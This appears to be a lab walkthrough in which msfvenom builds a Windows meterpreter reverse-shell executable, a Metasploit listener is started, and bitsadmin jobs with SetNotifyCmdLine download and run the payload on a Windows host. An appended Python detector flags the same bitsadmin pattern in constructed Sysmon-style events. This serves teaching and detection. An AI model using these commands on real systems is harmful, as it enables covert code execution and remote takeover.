┌──(root㉿kali)-[/var/www/html/test]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.145 LPORT=4444 -f exe > bits.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Run the following commands in the Metasploit console to start the listener:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.8.145
lhost => 192.168.8.145
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > exploit
Create a job on the Windows host:
PS C:\Users\snowwolf\Desktop> bitsadmin /create ghostwolflab
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Created job {720868B7-62A2-45B8-B55F-400BD6533ABD}.
Then add the file to be transferred:
PS C:\Users\snowwolf\Desktop> bitsadmin /addfile ghostwolflab http://192.168.8.145/test/bits.exe C:\Users\snowwolf\Desktop\bits.exe
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Added http://192.168.8.145/test/bits.exe -> C:\Users\snowwolf\Desktop\bits.exe to job.
Next, set a command to execute; this command downloads the file and runs the payload:
PS C:\Users\snowwolf\Desktop> bitsadmin /SetNotifyCmdLine ghostwolflab cmd.exe "/c bitsadmin.exe /complete ghostwolflab | start /B C:\Users\snowwolf\Desktop\bits.exe"
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
notification command line set to 'cmd.exe' '/c bitsadmin.exe /complete ghostwolflab | start /B C:\Users\snowwolf\Desktop\bits.exe'.
Then we need to set a minimum retry delay for BITSAdmin, to keep it from running continuously if an error occurs:
PS C:\Users\snowwolf\Desktop> bitsadmin /SetMinRetryDelay ghostwolflab 120
BITSADMIN version 3.0 [ 7.5.7600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.
BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
Minimum retry delay set to 120.
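As an added defender-side example (not part of the original walkthrough), the following Python flags the pattern shown above in process-creation telemetry: bitsadmin adding an HTTP download to a job, bitsadmin setting a notification command line, and a shell being spawned by the BITS service host when the job completes. The records are constructed Sysmon-style events that mirror the commands above plus one benign admin invocation; the svchost parent command line naming the BITS service is an assumption about how the service is hosted.

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1 fields), not real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /create ghostwolflab", "ParentImage": PS},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /addfile ghostwolflab http://192.168.8.145/test/bits.exe C:\Users\snowwolf\Desktop\bits.exe",
     "ParentImage": PS},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r'bitsadmin /SetNotifyCmdLine ghostwolflab cmd.exe "/c bitsadmin.exe /complete ghostwolflab | start /B C:\Users\snowwolf\Desktop\bits.exe"',
     "ParentImage": PS},
    # The notification command fires from the BITS service host, not from the user's shell
    # (assumed parent command line for the service host).
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c bitsadmin.exe /complete ghostwolflab | start /B C:\Users\snowwolf\Desktop\bits.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "ParentCommandLine": "svchost.exe -k netsvcs -p -s BITS"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",  # benign: an admin listing jobs
     "CommandLine": "bitsadmin /list /allusers /verbose",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")


def bits_abuse_reasons(event):
    """Return the reasons a process-creation event looks like BITS job abuse ([] if none)."""
    image = event["Image"].lower()
    cmd = event["CommandLine"].lower()
    parent = event["ParentImage"].lower()
    parent_cmd = event.get("ParentCommandLine", "").lower()
    reasons = []
    if image.endswith("bitsadmin.exe"):
        if "/setnotifycmdline" in cmd:
            reasons.append("notification command line set: a program runs when the job completes")
        if re.search(r"/(addfile|transfer)\b.*\bhttps?://", cmd):
            reasons.append("remote HTTP(S) download added to a BITS job")
        if re.search(r"/(addfile|transfer)\b.*\\users\\.*\.(exe|dll|ps1|bat|vbs|js)\b", cmd):
            reasons.append("download target is an executable under a user profile")
    # A shell whose parent is the svchost instance hosting BITS is the NotifyCmdLine firing.
    if parent.endswith("svchost.exe") and "bits" in parent_cmd and image.endswith(SHELLS):
        reasons.append("shell spawned by the BITS service host (NotifyCmdLine execution)")
    return reasons


def scan(events):
    """Map event index -> reasons for every event that triggers at least one rule."""
    return {i: r for i, e in enumerate(events) if (r := bits_abuse_reasons(e))}
```

Running `scan(SAMPLE_EVENTS)` flags the addfile, SetNotifyCmdLine and svchost-spawned cmd.exe records and leaves the job creation and the listing untouched.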